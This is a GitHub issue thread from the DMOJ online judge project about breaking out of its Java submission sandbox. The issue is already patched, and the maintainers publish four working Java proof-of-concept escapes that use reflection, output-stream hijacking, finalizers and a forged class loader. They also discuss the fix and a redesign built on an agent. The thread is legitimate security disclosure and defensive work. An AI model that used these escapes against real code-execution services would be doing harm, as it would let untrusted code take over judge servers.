### ISSUE TITLE
Java sandbox can be broken out of

### ISSUE THREAD

**Issue by Xyene** [DMOJ/judge#152]

**Comment by Xyene** [comment]
Now that the issue is patched there should be no problem with making public the malicious submissions (3 possibilities were discovered).

### Disabling _safeBlock
```java
import java.io.*;
import java.lang.reflect.*;

public class Brick {
   public static void main(String[] argv) throws Exception {
       Class safe = Brick.class.getClassLoader().getClass().getEnclosingClass();
       Field safeBlock = safe.getDeclaredField("_safeBlock");
       safeBlock.setAccessible(true);
       safeBlock.set(null, true);
       new File("C:/pwned.txt").createNewFile();
   }
}
```

While `ClassLoader.getSystemClassLoader` is disabled by the security manager and `Class.forName("ca.dmoj.java.JavaSafeExecutor")` by the custom ClassLoader used to load submissions, walking up from the submission class ClassLoader to JavaSafeExecutor (which defines it anonymously) allows breaking out of the sandbox by setting `_safeBlock` to true.

### Faking `UnsafePrintStream`'s `BufferedWriter`
`JavaSafeExecutor` trusts `System.out.flush()` to not be malicious and calls it with no sandboxing, but this is not necessarily the case.

```java
import java.io.*;
import java.lang.reflect.*;

public class Brick {
   public static void main(String[] argv) throws Exception {
       Field output = System.out.getClass().getDeclaredField("writer");
       output.setAccessible(true);
       Object writer = output.get(System.out);

       output.set(System.out, new BufferedWriter(new PrintWriter(new ByteArrayOutputStream()))
       {
           @Override
           public void flush() throws IOException {
             new File("C:/pwned.txt").createNewFile();
           }
       });
   }
}
```

### Abuse the JVM's `FinalizerThread`
Pretty much any finalizer would end up being run outside of the sandbox, because by the time they are called the main thread that controls the sandbox has exited or is close to doing so.

```java
import java.io.*;
import java.lang.reflect.*;
import java.util.*;

public class Brick {
  static List<Object> obj = new ArrayList<Object>();

  public static void main(String[] argv) throws Exception {
      for (int i = 0; i < 1000; i++) {
         obj.add(new Object() {
           public void finalize() {
             try {
               new File("C:/pwned.txt").createNewFile();
             } catch (Exception e) {}
           }
         });
      }
      obj.clear();
  }
}
```

---

The fix involves completely removing `_safeBlock`, and denying any `setAccessible(true)` call from classes that have no package.

**Comment by Xyene** [comment]
@quantum5 found another vulnerability related to how `printStateAndExit` is given all permissions.

### Fake a `ca.dmoj.java.JavaSafeExecutor`
```java
import java.io.*;
import java.lang.reflect.*;

public class Brick {
   public static void main(String[] argv) throws Exception {
        new ClassLoader() {
            public Class loadClass(String className) throws ClassNotFoundException {
                return findClass(className);
            }
            
            public Class findClass(String className) {
                if (className == "ca.dmoj.java.JavaSafeExecutor")
                                    return defineClass(className, new byte[] {-54, -2, -70, -66, 0, 0, 0, 51, 0, 31, 10, 0, 6, 0, 16, 9, 0, 17, 0, 18, 8, 0, 19, 10, 0, 20, 0, 21, 7, 0, 22, 7, 0, 23, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 17, 112, 114, 105, 110, 116, 83, 116, 97, 116, 101, 65, 110, 100, 69, 120, 105, 116, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 24, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 21, 74, 97, 118, 97, 83, 97, 102, 101, 69, 120, 101, 99, 117, 116, 111, 114, 46, 106, 97, 118, 97, 12, 0, 7, 0, 8, 7, 0, 25, 12, 0, 26, 0, 27, 1, 0, 13, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 33, 7, 0, 28, 12, 0, 29, 0, 30, 1, 0, 29, 99, 97, 47, 100, 109, 111, 106, 47, 106, 97, 118, 97, 47, 74, 97, 118, 97, 83, 97, 102, 101, 69, 120, 101, 99, 117, 116, 111, 114, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 3, 111, 117, 116, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 80, 114, 105, 110, 116, 83, 116, 114, 101, 97, 109, 1, 0, 7, 112, 114, 105, 110, 116, 108, 110, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 0, 33, 0, 5, 0, 6, 0, 0, 0, 0, 0, 2, 0, 1, 0, 7, 0, 8, 0, 1, 0, 9, 0, 0, 0, 29, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 1, 0, 10, 0, 0, 0, 6, 0, 1, 0, 0, 0, 5, 0, 9, 0, 11, 0, 8, 0, 2, 0, 9, 0, 0, 0, 37, 0, 2, 0, 0, 0, 0, 0, 9, -78, 0, 2, 18, 3, -74, 0, 4, -79, 0, 0, 0, 1, 0, 10, 0, 0, 0, 10, 0, 2, 0, 0, 0, 7, 0, 8, 0, 8, 0, 12, 0, 0, 0, 4, 0, 1, 0, 13, 0, 1, 0, 14, 0, 0, 0, 2, 0, 15}, 0, 488, null);
                try {
                    return findSystemClass(className);
                } catch (Exception e) {
                    return null;
                }
            }
        }.loadClass("ca.dmoj.java.JavaSafeExecutor").getDeclaredMethod("printStateAndExit").invoke(null);
    }
}
```

**Comment by Xyene** [comment]
Java 8 `Reflection.getCallerClass` fails due to the introduction of a [check on class privilege before loading the @CallerSensitive annotation](http://hg.openjdk.java.net/jdk8/jdk8/hotspot/file/87ee5ee27509/src/share/vm/classfile/classFileParser.cpp#l1766):

```
java.lang.BootstrapMethodError: call site initialization exception
       at java.lang.invoke.CallSite.makeSite(CallSite.java:341)
       at java.lang.invoke.MethodHandleNatives.linkCallSiteImpl(MethodHandleNat
ives.java:307)
       at java.lang.invoke.MethodHandleNatives.linkCallSite(MethodHandleNatives
.java:297)
       at self_test.main(self_test.java:13)
       at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
       at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.
java:62)
       at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAcces
sorImpl.java:43)
       at java.lang.reflect.Method.invoke(Method.java:498)
       at ca.dmoj.java.SubmissionThread.run(SubmissionThread.java:27)
Caused by: java.lang.InternalError: CallerSensitive annotation expected at frame
1
       at sun.reflect.Reflection.getCallerClass(Native Method)
       at ca.dmoj.java.SubmissionSecurityManager.checkPermission(SubmissionSecu
rityManager.java:28)
       at java.lang.reflect.AccessibleObject.setAccessible(AccessibleObject.jav
a:128)
       at java.lang.invoke.InnerClassLambdaMetafactory$1.run(InnerClassLambdaMe
tafactory.java:204)
       at java.lang.invoke.InnerClassLambdaMetafactory$1.run(InnerClassLambdaMe
tafactory.java:197)
       at java.security.AccessController.doPrivileged(Native Method)
       at java.lang.invoke.InnerClassLambdaMetafactory.buildCallSite(InnerClass
LambdaMetafactory.java:196)
       at java.lang.invoke.LambdaMetafactory.metafactory(LambdaMetafactory.java
:304)
       at java.lang.invoke.CallSite.makeSite(CallSite.java:302)
       ... 8 more
java.lang.BootstrapMethodError: call site initialization exception
       at java.lang.invoke.CallSite.makeSite(CallSite.java:341)
       at java.lang.invoke.MethodHandleNatives.linkCallSiteImpl(MethodHandleNat
ives.java:307)
       at java.lang.invoke.MethodHandleNatives.linkCallSite(MethodHandleNatives
.java:297)
       at self_test.main(self_test.java:13)
       at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
       at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.
java:62)
```

**Comment by virusdefender** [comment]
why don't try Java security policy

```
grant {
    permission java.io.FilePermission "/tmp", "read";
};
```

`/usr/bin/java -cp {exe_path} -Djava.security.manager -Djava.security.policy==policy Main`

**Comment by Xyene** [comment]
The reason we used a security manager is due to the difficulty of obtaining accurate memory usage on Linux: the `/proc/self/status` pseudofile disappears once the JVM exits, so it would require a Python-side thread to constantly poll to find the peak memory usage. To make this more accurate [we check this file right before the JVM exits](https://github.com/DMOJ/judge/blob/master/java_executor/src/ca/dmoj/java/JavaSafeExecutor.java#L95) and write the memory used (along with nanosecond-precision time + a couple other details) into a `state` file in the submission directory that the Python side then opens and interprets.

A proper security policy would certainly make the sandbox much more secure, but it would also decrease accuracy of memory and time reporting.

**Comment by Xyene** [comment]
@virusdefender thanks for mentioning policy files! Though we had considered them when we originally wrote the sandbox. we had another idea today on how to use them in conjunction with an agent. 

Now submissions are ran with [SubmissionAgent](https://github.com/DMOJ/judge/blob/master/java_sandbox/src/ca/dmoj/java/SubmissionAgent.java) as `-javaagent`, and through it we control [a faster `System.out`](https://github.com/DMOJ/judge/blob/master/java_sandbox/src/ca/dmoj/java/UnsafePrintStream.java) as well as disallowing any unwanted class ([e.g. BigInteger](https://github.com/DMOJ/judge/blob/master/java_sandbox/src/ca/dmoj/java/SubmissionAgent.java#L33)) via the instrumentation support.
